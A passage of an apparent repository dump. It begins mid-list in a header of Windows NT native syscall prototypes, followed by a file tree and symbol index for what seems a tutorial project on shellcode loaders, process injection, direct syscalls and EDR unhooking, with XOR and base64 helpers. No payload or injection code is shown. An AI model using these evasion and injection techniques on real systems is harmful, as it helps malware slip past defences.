OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN HANDLE TransactionHandle);
EXTERN_C NTSTATUS NtOpenKeyTransactedEx(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG OpenOptions,
IN HANDLE TransactionHandle);
EXTERN_C NTSTATUS NtOpenKeyedEvent(
OUT PHANDLE KeyedEventHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenMutant(
OUT PHANDLE MutantHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenObjectAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN PUNICODE_STRING ObjectTypeName,
IN PUNICODE_STRING ObjectName,
IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
IN HANDLE ClientToken,
IN ACCESS_MASK DesiredAccess,
IN ACCESS_MASK GrantedAccess,
IN PPRIVILEGE_SET Privileges OPTIONAL,
IN BOOLEAN ObjectCreation,
IN BOOLEAN AccessGranted,
OUT PBOOLEAN GenerateOnClose);
EXTERN_C NTSTATUS NtOpenPartition(
OUT PHANDLE PartitionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenPrivateNamespace(
OUT PHANDLE NamespaceHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PVOID BoundaryDescriptor);
EXTERN_C NTSTATUS NtOpenProcessToken(
IN HANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
OUT PHANDLE TokenHandle);
EXTERN_C NTSTATUS NtOpenRegistryTransaction(
OUT PHANDLE RegistryHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenResourceManager(
OUT PHANDLE ResourceManagerHandle,
IN ACCESS_MASK DesiredAccess,
IN HANDLE TmHandle,
IN LPGUID ResourceManagerGuid OPTIONAL,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL);
EXTERN_C NTSTATUS NtOpenSemaphore(
OUT PHANDLE SemaphoreHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenSession(
OUT PHANDLE SessionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenSymbolicLinkObject(
OUT PHANDLE LinkHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenThread(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL);
EXTERN_C NTSTATUS NtOpenTimer(
OUT PHANDLE TimerHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtOpenTransaction(
OUT PHANDLE TransactionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN LPGUID Uow,
IN HANDLE TmHandle OPTIONAL);
EXTERN_C NTSTATUS NtOpenTransactionManager(
OUT PHANDLE TmHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PUNICODE_STRING LogFileName OPTIONAL,
IN LPGUID TmIdentity OPTIONAL,
IN ULONG OpenOptions OPTIONAL);
EXTERN_C NTSTATUS NtPlugPlayControl(
IN PLUGPLAY_CONTROL_CLASS PnPControlClass,
IN OUT PVOID PnPControlData,
IN ULONG PnPControlDataLength);
EXTERN_C NTSTATUS NtPrePrepareComplete(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
EXTERN_C NTSTATUS NtPrePrepareEnlistment(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
EXTERN_C NTSTATUS NtPrepareComplete(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
EXTERN_C NTSTATUS NtPrepareEnlistment(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
EXTERN_C NTSTATUS NtPrivilegeCheck(
IN HANDLE ClientToken,
IN OUT PPRIVILEGE_SET RequiredPrivileges,
OUT PBOOLEAN Result);
EXTERN_C NTSTATUS NtPrivilegeObjectAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN HANDLE ClientToken,
IN ACCESS_MASK DesiredAccess,
IN PPRIVILEGE_SET Privileges,
IN BOOLEAN AccessGranted);
EXTERN_C NTSTATUS NtPrivilegedServiceAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PUNICODE_STRING ServiceName,
IN HANDLE ClientToken,
IN PPRIVILEGE_SET Privileges,
IN BOOLEAN AccessGranted);
EXTERN_C NTSTATUS NtPropagationComplete(
IN HANDLE ResourceManagerHandle,
IN ULONG RequestCookie,
IN ULONG BufferLength,
IN PVOID Buffer);
EXTERN_C NTSTATUS NtPropagationFailed(
IN HANDLE ResourceManagerHandle,
IN ULONG RequestCookie,
IN NTSTATUS PropStatus);
EXTERN_C NTSTATUS NtPulseEvent(
IN HANDLE EventHandle,
OUT PULONG PreviousState OPTIONAL);
EXTERN_C NTSTATUS NtQueryAuxiliaryCounterFrequency(
OUT PULONGLONG lpAuxiliaryCounterFrequency);
EXTERN_C NTSTATUS NtQueryBootEntryOrder(
OUT PULONG Ids OPTIONAL,
IN OUT PULONG Count);
EXTERN_C NTSTATUS NtQueryBootOptions(
OUT PBOOT_OPTIONS BootOptions OPTIONAL,
IN OUT PULONG BootOptionsLength);
EXTERN_C NTSTATUS NtQueryDebugFilterState(
IN ULONG ComponentId,
IN ULONG Level);
EXTERN_C NTSTATUS NtQueryDirectoryFileEx(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN ULONG QueryFlags,
IN PUNICODE_STRING FileName OPTIONAL);
EXTERN_C NTSTATUS NtQueryDirectoryObject(
IN HANDLE DirectoryHandle,
OUT PVOID Buffer OPTIONAL,
IN ULONG Length,
IN BOOLEAN ReturnSingleEntry,
IN BOOLEAN RestartScan,
IN OUT PULONG Context,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryDriverEntryOrder(
IN PULONG Ids OPTIONAL,
IN OUT PULONG Count);
EXTERN_C NTSTATUS NtQueryEaFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PFILE_FULL_EA_INFORMATION Buffer,
IN ULONG Length,
IN BOOLEAN ReturnSingleEntry,
IN PFILE_GET_EA_INFORMATION EaList OPTIONAL,
IN ULONG EaListLength,
IN PULONG EaIndex OPTIONAL,
IN BOOLEAN RestartScan);
EXTERN_C NTSTATUS NtQueryFullAttributesFile(
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PFILE_NETWORK_OPEN_INFORMATION FileInformation);
EXTERN_C NTSTATUS NtQueryInformationAtom(
IN USHORT Atom,
IN ATOM_INFORMATION_CLASS AtomInformationClass,
OUT PVOID AtomInformation,
IN ULONG AtomInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationByName(
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass);
EXTERN_C NTSTATUS NtQueryInformationEnlistment(
IN HANDLE EnlistmentHandle,
IN ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass,
OUT PVOID EnlistmentInformation,
IN ULONG EnlistmentInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationJobObject(
IN HANDLE JobHandle,
IN JOBOBJECTINFOCLASS JobObjectInformationClass,
OUT PVOID JobObjectInformation,
IN ULONG JobObjectInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationPort(
IN HANDLE PortHandle,
IN PORT_INFORMATION_CLASS PortInformationClass,
OUT PVOID PortInformation,
IN ULONG Length,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationResourceManager(
IN HANDLE ResourceManagerHandle,
IN RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass,
OUT PVOID ResourceManagerInformation,
IN ULONG ResourceManagerInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationTransaction(
IN HANDLE TransactionHandle,
IN TRANSACTION_INFORMATION_CLASS TransactionInformationClass,
OUT PVOID TransactionInformation,
IN ULONG TransactionInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationTransactionManager(
IN HANDLE TransactionManagerHandle,
IN TRANSACTIONMANAGER_INFORMATION_CLASS TransactionManagerInformationClass,
OUT PVOID TransactionManagerInformation,
IN ULONG TransactionManagerInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationWorkerFactory(
IN HANDLE WorkerFactoryHandle,
IN WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,
OUT PVOID WorkerFactoryInformation,
IN ULONG WorkerFactoryInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryInstallUILanguage(
OUT PLANGID InstallUILanguageId);
EXTERN_C NTSTATUS NtQueryIntervalProfile(
IN KPROFILE_SOURCE ProfileSource,
OUT PULONG Interval);
EXTERN_C NTSTATUS NtQueryIoCompletion(
IN HANDLE IoCompletionHandle,
IN IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,
OUT PVOID IoCompletionInformation,
IN ULONG IoCompletionInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryLicenseValue(
IN PUNICODE_STRING ValueName,
OUT PULONG Type OPTIONAL,
OUT PVOID SystemData OPTIONAL,
IN ULONG DataSize,
OUT PULONG ResultDataSize);
EXTERN_C NTSTATUS NtQueryMultipleValueKey(
IN HANDLE KeyHandle,
IN OUT PKEY_VALUE_ENTRY ValueEntries,
IN ULONG EntryCount,
OUT PVOID ValueBuffer,
IN PULONG BufferLength,
OUT PULONG RequiredBufferLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryMutant(
IN HANDLE MutantHandle,
IN MUTANT_INFORMATION_CLASS MutantInformationClass,
OUT PVOID MutantInformation,
IN ULONG MutantInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryOpenSubKeys(
IN POBJECT_ATTRIBUTES TargetKey,
OUT PULONG HandleCount);
EXTERN_C NTSTATUS NtQueryOpenSubKeysEx(
IN POBJECT_ATTRIBUTES TargetKey,
IN ULONG BufferLength,
OUT PVOID Buffer,
OUT PULONG RequiredSize);
EXTERN_C NTSTATUS NtQueryPortInformationProcess();
EXTERN_C NTSTATUS NtQueryQuotaInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PFILE_USER_QUOTA_INFORMATION Buffer,
IN ULONG Length,
IN BOOLEAN ReturnSingleEntry,
IN PFILE_QUOTA_LIST_INFORMATION SidList OPTIONAL,
IN ULONG SidListLength,
IN PSID StartSid OPTIONAL,
IN BOOLEAN RestartScan);
EXTERN_C NTSTATUS NtQuerySecurityAttributesToken(
IN HANDLE TokenHandle,
IN PUNICODE_STRING Attributes OPTIONAL,
IN ULONG NumberOfAttributes,
OUT PVOID Buffer,
IN ULONG Length,
OUT PULONG ReturnLength);
EXTERN_C NTSTATUS NtQuerySecurityObject(
IN HANDLE Handle,
IN SECURITY_INFORMATION SecurityInformation,
OUT PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
IN ULONG Length,
OUT PULONG LengthNeeded);
EXTERN_C NTSTATUS NtQuerySecurityPolicy(
IN ULONG_PTR UnknownParameter1,
IN ULONG_PTR UnknownParameter2,
IN ULONG_PTR UnknownParameter3,
IN ULONG_PTR UnknownParameter4,
IN ULONG_PTR UnknownParameter5,
IN ULONG_PTR UnknownParameter6);
EXTERN_C NTSTATUS NtQuerySemaphore(
IN HANDLE SemaphoreHandle,
IN SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,
OUT PVOID SemaphoreInformation,
IN ULONG SemaphoreInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQuerySymbolicLinkObject(
IN HANDLE LinkHandle,
IN OUT PUNICODE_STRING LinkTarget,
OUT PULONG ReturnedLength OPTIONAL);
EXTERN_C NTSTATUS NtQuerySystemEnvironmentValue(
IN PUNICODE_STRING VariableName,
OUT PVOID VariableValue,
IN ULONG ValueLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQuerySystemEnvironmentValueEx(
IN PUNICODE_STRING VariableName,
IN LPGUID VendorGuid,
OUT PVOID Value OPTIONAL,
IN OUT PULONG ValueLength,
OUT PULONG Attributes OPTIONAL);
EXTERN_C NTSTATUS NtQuerySystemInformationEx(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN PVOID InputBuffer,
IN ULONG InputBufferLength,
OUT PVOID SystemInformation OPTIONAL,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtQueryTimerResolution(
OUT PULONG MaximumTime,
OUT PULONG MinimumTime,
OUT PULONG CurrentTime);
EXTERN_C NTSTATUS NtQueryWnfStateData(
IN PCWNF_STATE_NAME StateName,
IN PCWNF_TYPE_ID TypeId OPTIONAL,
IN PVOID ExplicitScope OPTIONAL,
OUT PWNF_CHANGE_STAMP ChangeStamp,
OUT PVOID Buffer OPTIONAL,
IN OUT PULONG BufferSize);
EXTERN_C NTSTATUS NtQueryWnfStateNameInformation(
IN PCWNF_STATE_NAME StateName,
IN PCWNF_TYPE_ID NameInfoClass,
IN PVOID ExplicitScope OPTIONAL,
OUT
gitextract_5ot6inlx/
├── README.md
├── chapter4-demo1/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.obj
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ └── vc143.pdb
│ ├── demo1.sln
│ └── enc.py
├── chapter4-demo2/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1 - 快捷方式.lnk
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ ├── nt.asm
│ │ ├── nt.h
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.obj
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ ├── nt.obj
│ │ └── vc143.pdb
│ ├── demo1.sln
│ └── enc.py
├── chapter4-demo3/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1 - 快捷方式.lnk
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ ├── nt.asm
│ │ ├── nt.h
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ ├── link.write.1.tlog
│ │ │ └── unsuccessfulbuild
│ │ ├── nt.obj
│ │ └── vc143.pdb
│ └── demo1.sln
├── chapter4-demo4/
│ ├── CODE_OF_CONDUCT.md
│ ├── LICENSE.txt
│ ├── README.md
│ ├── ShellcodeFluctuation/
│ │ ├── ShellcodeFluctuation.vcxproj
│ │ ├── ShellcodeFluctuation.vcxproj.filters
│ │ ├── ShellcodeFluctuation.vcxproj.user
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── header.h
│ │ ├── main.cpp
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── Shellcod.9eed9e19.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── ShellcodeFluctuation.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── ShellcodeFluctuation.exe.recipe
│ │ │ ├── ShellcodeFluctuation.ilk
│ │ │ ├── ShellcodeFluctuation.log
│ │ │ ├── base64.obj
│ │ │ ├── main.obj
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── Shellcod.9eed9e19.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── ShellcodeFluctuation.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ ├── ShellcodeFluctuation.exe.recipe
│ │ ├── ShellcodeFluctuation.iobj
│ │ ├── ShellcodeFluctuation.ipdb
│ │ ├── ShellcodeFluctuation.log
│ │ ├── base64.obj
│ │ ├── main.obj
│ │ └── vc143.pdb
│ ├── ShellcodeFluctuation.sln
│ └── x64/
│ ├── Debug/
│ │ └── ShellcodeFluctuation.pdb
│ └── Release/
│ └── ShellcodeFluctuation.pdb
├── demo1/
│ ├── README.md
│ └── shellcode_execute/
│ └── shellcode_execute/
│ ├── shellcode_execute/
│ │ ├── resource.h
│ │ ├── shellcode_execute.aps
│ │ ├── shellcode_execute.cpp
│ │ ├── shellcode_execute.rc
│ │ ├── shellcode_execute.vcxproj
│ │ ├── shellcode_execute.vcxproj.filters
│ │ └── shellcode_execute.vcxproj.user
│ └── shellcode_execute.sln
├── demo2/
│ ├── README.md
│ └── shellcode_execut3/
│ ├── shellcode_execut3/
│ │ ├── App.config
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ └── shellcode_execut3.csproj
│ └── shellcode_execut3.sln
├── demo3/
│ ├── README.md
│ └── SharpInjector-master/
│ ├── .gitignore
│ ├── README.md
│ ├── ScEncryptor/
│ │ ├── App.config
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ └── ScEncryptor.csproj
│ ├── SharpInjector/
│ │ ├── App.config
│ │ ├── CreateFiber.cs
│ │ ├── CreateRemoteThread.cs
│ │ ├── CreateRemoteThreadEx.cs
│ │ ├── CreateThread.cs
│ │ ├── EtwpCreateEtwThread.cs
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ ├── AssemblyInfo.cs
│ │ │ ├── Resource1.Designer.cs
│ │ │ └── Resource1.resx
│ │ ├── QueueUserAPC.cs
│ │ ├── RtlCreateUserThread.cs
│ │ ├── SharpInjector.csproj
│ │ ├── Shellycode.cs
│ │ └── WinAPI.cs
│ └── SharpInjector.sln
├── demo4/
│ └── syscall/
│ ├── syscall/
│ │ ├── Syscall.asm
│ │ ├── syscall.vcxproj
│ │ ├── syscall.vcxproj.filters
│ │ ├── syscall.vcxproj.user
│ │ ├── syscall_call.cpp
│ │ └── x64/
│ │ └── Debug/
│ │ ├── Syscall.obj
│ │ ├── syscall.exe.recipe
│ │ ├── syscall.ilk
│ │ ├── syscall.log
│ │ ├── syscall.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ ├── link.write.1.tlog
│ │ │ └── syscall.lastbuildstate
│ │ ├── syscall_call.obj
│ │ ├── vc143.idb
│ │ └── vc143.pdb
│ └── syscall.sln
├── demo5/
│ └── syscall3/
│ ├── syscall3/
│ │ ├── 1-asm.x64.asm
│ │ ├── 1.cpp
│ │ ├── 1.h
│ │ ├── syscall3.cpp
│ │ ├── syscall3.vcxproj
│ │ ├── syscall3.vcxproj.filters
│ │ └── syscall3.vcxproj.user
│ └── syscall3.sln
└── demo6/
├── unhook_demo/
│ ├── Header.h
│ ├── unhook_demo.cpp
│ ├── unhook_demo.vcxproj
│ ├── unhook_demo.vcxproj.filters
│ └── unhook_demo.vcxproj.user
└── unhook_demo.sln
SYMBOL INDEX (320 symbols across 34 files)
FILE: chapter4-demo1/demo1/Header.h
function XOR_KEY (line 3) | const int XOR_KEY{ 8 }
FILE: chapter4-demo1/demo1/base64.cpp
function pos_of_char (line 55) | static unsigned int pos_of_char(const unsigned char chr) {
function insert_linebreaks (line 73) | static std::string insert_linebreaks(std::string str, size_t distance) {
function encode_with_line_breaks (line 92) | static std::string encode_with_line_breaks(String s) {
function encode_pem (line 97) | static std::string encode_pem(String s) {
function encode_mime (line 102) | static std::string encode_mime(String s) {
function encode (line 107) | static std::string encode(String s, bool url) {
function base64_encode (line 111) | std::string base64_encode(unsigned char const* bytes_to_encode, size_t i...
function decode (line 163) | static std::string decode(String encoded_string, bool remove_linebreaks) {
function base64_decode (line 243) | std::string base64_decode(std::string const& s, bool remove_linebreaks) {
function base64_encode (line 247) | std::string base64_encode(std::string const& s, bool url) {
function base64_encode_pem (line 251) | std::string base64_encode_pem(std::string const& s) {
function base64_encode_mime (line 255) | std::string base64_encode_mime(std::string const& s) {
function base64_encode (line 266) | std::string base64_encode(std::string_view s, bool url) {
function base64_encode_pem (line 270) | std::string base64_encode_pem(std::string_view s) {
function base64_encode_mime (line 274) | std::string base64_encode_mime(std::string_view s) {
function base64_decode (line 278) | std::string base64_decode(std::string_view s, bool remove_linebreaks) {
FILE: chapter4-demo1/demo1/demo1.cpp
function main (line 45) | int main()
FILE: chapter4-demo2/demo1/Header.h
function XOR_KEY (line 3) | const int XOR_KEY{ 8 }
function std (line 6) | const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
FILE: chapter4-demo2/demo1/base64.cpp
function pos_of_char (line 55) | static unsigned int pos_of_char(const unsigned char chr) {
function insert_linebreaks (line 73) | static std::string insert_linebreaks(std::string str, size_t distance) {
function encode_with_line_breaks (line 92) | static std::string encode_with_line_breaks(String s) {
function encode_pem (line 97) | static std::string encode_pem(String s) {
function encode_mime (line 102) | static std::string encode_mime(String s) {
function encode (line 107) | static std::string encode(String s, bool url) {
function base64_encode (line 111) | std::string base64_encode(unsigned char const* bytes_to_encode, size_t i...
function decode (line 163) | static std::string decode(String encoded_string, bool remove_linebreaks) {
function base64_decode (line 243) | std::string base64_decode(std::string const& s, bool remove_linebreaks) {
function base64_encode (line 247) | std::string base64_encode(std::string const& s, bool url) {
function base64_encode_pem (line 251) | std::string base64_encode_pem(std::string const& s) {
function base64_encode_mime (line 255) | std::string base64_encode_mime(std::string const& s) {
function base64_encode (line 266) | std::string base64_encode(std::string_view s, bool url) {
function base64_encode_pem (line 270) | std::string base64_encode_pem(std::string_view s) {
function base64_encode_mime (line 274) | std::string base64_encode_mime(std::string_view s) {
function base64_decode (line 278) | std::string base64_decode(std::string_view s, bool remove_linebreaks) {
FILE: chapter4-demo2/demo1/demo1.cpp
function replace (line 47) | std::string replace(const std::string& inStr, const char* pSrc, const ch...
function LPVOID (line 74) | LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocG...
function main (line 108) | int main()
FILE: chapter4-demo3/demo1/Header.h
function XOR_KEY (line 3) | const int XOR_KEY{ 8 }
function std (line 6) | const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
FILE: chapter4-demo3/demo1/base64.cpp
function pos_of_char (line 55) | static unsigned int pos_of_char(const unsigned char chr) {
function insert_linebreaks (line 73) | static std::string insert_linebreaks(std::string str, size_t distance) {
function encode_with_line_breaks (line 92) | static std::string encode_with_line_breaks(String s) {
function encode_pem (line 97) | static std::string encode_pem(String s) {
